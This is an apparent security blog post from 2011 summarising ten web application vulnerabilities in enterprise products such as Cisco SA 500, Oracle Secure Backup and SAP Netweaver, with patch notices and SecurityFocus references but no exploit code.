Top 10 Web Application Vulnerabilities 07/15/11 - 08/14/11

1) Cisco SA 500 Series Appliances Web Management Interface Remote Command Injection/SQL Injection Vulnerabilities

 

Cisco SA 500 series security appliances are susceptible to a Remote Command Injection and a SQL Injection vulnerability in the web management interface. The Remote Command Injection vulnerability be exploited to run arbitrary commands with root-level privileges on the operating system, while SQL Injection can give an attacker full access to a backend database, and in certain circumstances can be utilized to take complete control of a system. Both of these vulnerabilities require authentication to be successfully exploited. Updates which resolve these issues are available. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/48810
http://www.securityfocus.com/bid/48812

 

2) Oracle Secure Backup 'validate_login' Command Injection Remote Code Execution Vulnerability

 

Oracle Secure Backup is susceptible to a Remote Command Injection vulnerability.  Successful exploitation will give an attacker the means to execute arbitrary code in context of the web server process, while failed attempts will  likely result in a Denial-of-Service condition.  Updates which resolve this vulnerability are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/48752

 

3) SAP Netweaver Invoker Servlet Remote Code Execution Vulnerability

 

SAP Netweaver is susceptible to a Remote Code Execution vulnerability. An attacker can leverage this to execute arbitrary script code in context of the vulnerable application. Updates which resolve this issue are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/48925

 

4) Symantec Web Gateway Management GUI 'forget.php' SQL Injection Vulnerability

 

Symantec Web Gateway is susceptible to a SQL Injection vulnerability. Successful exploitation could give an attacker the means to access or modify backend database contents, or in some circumstances be utilized to take control of the server hosting the database. Updates which resolve this vulnerability are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/48318

 

5) Oracle GlassFish Enterprise Server Multiple Input Validation Vulnerabilities 

 

Oracle GlassFish Enterprise Server is susceptible to multiple vulnerabilities including  Cross-Site Scripting and HTML Injection. Successful exploitation of these vulnerabilities could be used to alter how the site appears, steal authentication credentials, or execute malicious scripts in the browsers of unsuspecting users. Updates which resolve these vulnerabilities are available. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/48797

 

6) SAP Netweaver Information Disclosure/Cross-Site Scripting Vulnerabilities   

 

SAP Netweaver is susceptible to multiple vulnerabilities including Information Disclosure and Cross-Site Scripting. Successful exploitation would give an attacker unauthorized access to sensitive information,   the means to execute code in the browser of an unsuspecting user, and the ability to steal cookie-based authentication credentials. Updates which resolve these vulnerabilities are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/48718

 

7) HP Network Automation SQL Injection/Cross-Site Scripting Vulnerabilities

 

HP Network Automation is susceptible to SQL Injection and Cross-Site Scripting vulnerabilities. If exploited, these vulnerabilities could lead to compromise of the application, the theft of confidential information and authentication credentials, or execution of malicious scripts in the browsers of unsuspecting users. Updates which resolve these issues are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/48924
http://www.securityfocus.com/bid/48922

 

8) Symantec Endpoint Protection Cross- Site Request Forgery/Cross-Site Scripting Vulnerabilities

 

Symantec Endpoint Protection is susceptible to multiple vulnerabilities including Cross-Site Request Forgery and Cross-Site Scripting. If exploited, these vulnerabilities could lead to the theft of confidential information and authentication credentials, execution of malicious scripts in the browsers of unsuspecting users, or abuse of the trust a web application places in a user. Updates which resolve this vulnerability are available. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/49101
http://www.securityfocus.com/bid/48231

 

9) Google Search Appliance  Cross-Site Scripting Vulnerability

 

Google Search Appliance is susceptible to a Cross-Site Scripting vulnerability. Arbitrary script code can be executed in context of the affected site in the browsers of unsuspecting users if this vulnerability is successfully exploited. Updates which resolve this vulnerability are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/48957

 

10) HP Arcsight Connector Appliance Cross-Site Scripting Vulnerability

 

HP Arcsight Connector Appliance is susceptible to a Cross-Site Scripting vulnerability. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems. Updates which resolve these vulnerabilities are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/48694

Leave a Comment

We encourage you to share your comments on this post. Comments are moderated and will be reviewed
and posted as promptly as possible during regular business hours

To ensure your comment is published, be sure to follow the Community Guidelines.

Be sure to enter a unique name. You can't reuse a name that's already in use.
Be sure to enter a unique email address. You can't reuse an email address that's already in use.
Type the characters you see in the picture above.Type the words you hear.
Search
Showing results for 
Search instead for 
Do you mean 
About the Author
Featured


Follow Us
The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation.